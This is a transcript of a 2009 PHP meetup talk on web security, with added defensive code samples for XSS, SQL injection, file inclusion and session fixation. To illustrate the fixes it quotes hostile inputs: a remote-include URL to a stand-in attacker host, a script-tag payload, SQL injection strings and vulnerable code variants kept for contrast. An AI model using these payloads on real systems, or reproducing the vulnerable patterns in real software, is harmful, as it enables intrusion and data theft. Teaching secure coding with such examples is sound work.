Security In PHP Applications

Seminar on various security issues faced by PHP developers and ways to avoid them.

The examples used in the seminar can be downloaded from http://www.sanisoft.com/blog/wp-content/uploads/2009/08/security.tar.gz

Transcript of "Security In PHP Applications"

Security in PHP Applications
By: Aditya Mooley, Nagpur PHP Meetup, August '09

Who Am I?
- Aditya Mooley ( [email_address] )
- Zend Certified PHP 5 Engineer
- Working with SANIsoft Technologies for the last 6 years
- Open source contributor
- Writing secure web applications

We will discuss ...
- Why secure
- What to secure
- How to secure

Why secure?
- PHP is a widely used programming language for the web
- Used by individuals as well as corporates
- Handles a lot of critical and sensitive information
- Malicious users can misuse this information if they get access to it

Secure what?
- Secure code
- Secure database
- Secure web server

How to secure
- Follow some basic guidelines
- register_globals is the biggest evil. It must be off.
- Don't use $_REQUEST. Use the individual superglobals instead.
- Follow the thumb rule:
  - Filter input
  - Escape output

Security Issues
- Input validation
- Cross site scripting
- SQL injection
- File inclusion
- Session fixation
- and a lot more ...

Input Validation
- Don't trust your users
- Check every piece of data coming from the user
- Use built-in PHP functions like:
  - is_int, is_string, is_bool, etc.
  - the ctype_* category of functions
- Whitelist over blacklist
  - Check data for what is allowed instead of what is not allowed
Cross site scripting (XSS)
- XSS is a situation where an attacker can inject a carefully crafted HTML string which, when executed in the client browser, can cause unexpected results.
- This may lead to:
  - Session take over
  - Setting malicious cookies
  - Access to restricted areas

XSS ...
- Let's see an example
- XSS can be prevented by:
  - escaping the data with htmlentities() or htmlspecialchars()
  - filtering out the HTML tags with strip_tags()
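The "filter input, escape output" rule from the Input Validation and XSS slides, as an added example that is not one of the seminar's own examples: a constructed search request is whitelisted with ctype_* functions and then rendered both raw and escaped. The function names are my own.

```php
<?php
// Added example, not part of the slides: "filter input, escape output"
// applied to a constructed search request. Function names are my own.

// --- Filter input: whitelist what is allowed, reject everything else ---
function filter_username(string $raw): ?string
{
    // Letters and digits only, 3 to 20 characters; ctype_alnum('') is false
    $len = strlen($raw);
    return (ctype_alnum($raw) && $len >= 3 && $len <= 20) ? $raw : null;
}

function filter_page_number(string $raw): ?int
{
    // ctype_digit accepts ASCII digits only, so the cast below cannot be fooled
    if (!ctype_digit($raw)) {
        return null;
    }
    $n = (int) $raw;
    return ($n >= 1 && $n <= 1000) ? $n : null;
}

// --- Escape output: encode for HTML right where the value is printed ---
function h(string $s): string
{
    // ENT_QUOTES also encodes single quotes, so the result is safe inside
    // attribute values quoted either way; always name the charset
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Constructed request used instead of $_GET so this runs from the CLI.
// The 'q' value is the hostile input: markup hidden inside a search term.
$request = [
    'user' => 'alice',
    'page' => '7',
    'q'    => '<script>alert("xss")</script>',
];
$user = filter_username($request['user']);
$page = filter_page_number($request['page']);
if ($user === null || $page === null) {
    exit("400 Bad Request: invalid user or page\n");
}

// Vulnerable: the raw value is echoed, so the browser runs the script
$unsafe = '<p>Results for ' . $request['q'] . '</p>';
// Fixed: the same value escaped; the browser shows it as literal text
$safe = '<p>Results for ' . h($request['q'])
      . ' (user ' . h($user) . ', page ' . $page . ')</p>';
echo $unsafe, "\n", $safe, "\n";
```

strip_tags() is a weaker fallback than escaping: it removes markup the author did not want, but the text that survives still has to be escaped for the context it lands in.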
SQL Injection
- Code injection technique that exploits vulnerabilities in the SQL statements built by the code.
- Can lead to:
  - Removal of data
  - Access to critical information like passwords
- Can be caused by:
  - Incorrect filtering of escape characters
  - Incorrect type handling

SQL Injection ...
- Example1, Example2
- SQL injection can be prevented by:
  - mysql_real_escape_string() and similar functions
  - Typecasting data properly before passing it to SQL
  - Using prepared statements (MySQLi/PDO)
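The two fixes the slide lists, prepared statements and typecasting, beside the concatenated query they replace, as an added example that is not the seminar's Example1 or Example2. It uses an in-memory SQLite database through PDO so it runs offline; the table and the hostile inputs are constructed.

```php
<?php
// Added example, not from the slides: the same lookup written with string
// concatenation and with PDO prepared statements. Data is constructed.

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, role TEXT)');
$db->exec("INSERT INTO users (name, role) VALUES ('alice', 'admin'), ('bob', 'user')");

// Constructed hostile inputs: a "name" that closes the quote and an "id"
// that is not a number at all
$name = "nobody' OR '1'='1";
$id   = '2 OR 1=1';

// Vulnerable: the input is spliced into the SQL text, so the quote it
// contains ends the literal and the rest becomes part of the WHERE clause
$sql    = "SELECT name, role FROM users WHERE name = '" . $name . "'";
$leaked = $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
echo count($leaked), " row(s) from the concatenated query\n";      // 2: every user

// Fixed (1): prepared statement; the value is bound as data and can never
// change the shape of the query, whatever characters it contains
$stmt = $db->prepare('SELECT name, role FROM users WHERE name = :name');
$stmt->execute([':name' => $name]);
echo count($stmt->fetchAll(PDO::FETCH_ASSOC)), " row(s) from the prepared statement\n"; // 0

// Fixed (2): typecast numeric input before it goes near SQL and bind it
// with the right type; (int) '2 OR 1=1' is simply 2
$stmt = $db->prepare('SELECT name FROM users WHERE id = :id');
$stmt->bindValue(':id', (int) $id, PDO::PARAM_INT);
$stmt->execute();
echo $stmt->fetchColumn(), "\n";                                    // bob
```

With the MySQL driver, setting PDO::ATTR_EMULATE_PREPARES to false makes the server do the binding instead of the client interpolating escaped values.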
File Inclusion
- A technique by which an attacker can include a file from a remote location, or from the same server, which is not intended for general users
- The attacker can get shell access to the server, which can be used to any extent.
- Such attacks can be prevented by properly filtering the input data before using it in an include statement.

File Inclusion ...
- Remote File Inclusion
  - http://mysite.com/index.php?page=http://hacker.com/hacker.php
- Local File Inclusion
  - The attacker can send a relative path which can include a secret file on the web server, even outside the webroot.
  - Example.
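The filtering the slide calls for, done as a whitelist map rather than a character filter, as an added example that is not the seminar's own: the request value is only ever a key into a fixed list of pages. Page files are written to a temp directory so it runs offline; the requests are constructed.

```php
<?php
// Added example, not from the slides' tarball: the vulnerable include beside a
// whitelisted one. Page files are written to a temp directory so it runs offline.

$pagesDir = sys_get_temp_dir() . '/pages_' . getmypid();
mkdir($pagesDir);
file_put_contents("$pagesDir/home.php",  '<?php echo "home page", PHP_EOL;');
file_put_contents("$pagesDir/about.php", '<?php echo "about page", PHP_EOL;');

// Vulnerable (defined for contrast, never called here): the request value is
// used as the path, so a relative path walks out of the pages directory and,
// with allow_url_include=On, a URL pulls code from another server.
function render_vulnerable(string $dir, string $page): void
{
    include $dir . '/' . $page;
}

// Fixed: the request value is only a key into a fixed map; the user's string
// never becomes part of a filename. Unknown keys are refused.
const PAGES = ['home' => 'home.php', 'about' => 'about.php'];

function render_safe(string $dir, string $page): bool
{
    if (!array_key_exists($page, PAGES)) {
        return false;
    }
    include $dir . '/' . PAGES[$page];
    return true;
}

// Constructed requests: one legitimate, one relative path, one remote URL
foreach (['about', '../outside_webroot.txt', 'http://hacker.com/hacker.php'] as $req) {
    $ok = render_safe($pagesDir, $req);
    echo str_pad($req, 34), $ok ? 'included' : 'rejected', PHP_EOL;
}

// Second line of defence: keep this off in php.ini so include() cannot fetch URLs at all
echo 'allow_url_include = ', ini_get('allow_url_include') ? 'On' : 'Off', PHP_EOL;

array_map('unlink', glob("$pagesDir/*.php"));
rmdir($pagesDir);
```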
Session Fixation
- Through this technique, an attacker can get access to the valid session of a user.
- After this, there is no way for the website to differentiate between the two.
- The attacker can perform all the actions that are allowed to the original user.
- Example.

Session Fixation ...
- Session hijacking can be prevented by generating a new session id every time a user logs in.
- This can be done with session_regenerate_id()
- For extra security, disable the ini setting session.use_trans_sid
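A login handler that applies the slide's advice, as an added example that is not the seminar's own: the session id is regenerated at the moment the user's privileges change, and session.use_trans_sid is disabled along with the related settings that keep the id out of URLs. The credential store and password are constructed.

```php
<?php
// Added example, not the slide's own: a login handler that issues a fresh
// session id at the moment privileges change, plus the ini settings that keep
// the id out of URLs. The user store and credentials are constructed.

ini_set('session.use_trans_sid', '0');    // never append the id to links and forms
ini_set('session.use_only_cookies', '1'); // ignore any id arriving in the URL
ini_set('session.use_strict_mode', '1');  // refuse ids the server never issued

session_start();

// Constructed credential store: username => password hash
$users = ['alice' => password_hash('correct horse', PASSWORD_DEFAULT)];

function login(array $users, string $user, string $password): bool
{
    if (!isset($users[$user]) || !password_verify($password, $users[$user])) {
        return false;
    }
    // The browser arrived with some session id, possibly one an attacker
    // planted. Replace it before anything privileged is stored, and delete
    // the old session data (true) so that id is worthless from here on.
    session_regenerate_id(true);
    $_SESSION['user']         = $user;
    $_SESSION['logged_in_at'] = time();
    return true;
}

function logout(): void
{
    $_SESSION = [];
    session_destroy();
}

$before = session_id();
if (login($users, 'alice', 'correct horse')) {
    printf("id before login: %s\nid after login:  %s\n", $before, session_id());
    echo $before !== session_id() ? "session id rotated\n" : "BUG: id unchanged\n";
}
logout();
```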
Much more
- Web applications can be exploited in numerous other ways.
- Refer to:
  - http://www.phpwact.org/security/risk/catalog
  - http://www.phpwact.org/security/attack/catalog

References
- http://www.php.net
- http://en.wikipedia.org
- http://www.phpwact.org

Examples used in this presentation can be downloaded from http://www.sanisoft.com/blog/wp-content/uploads/2009/08/security.tar.gz

Thanks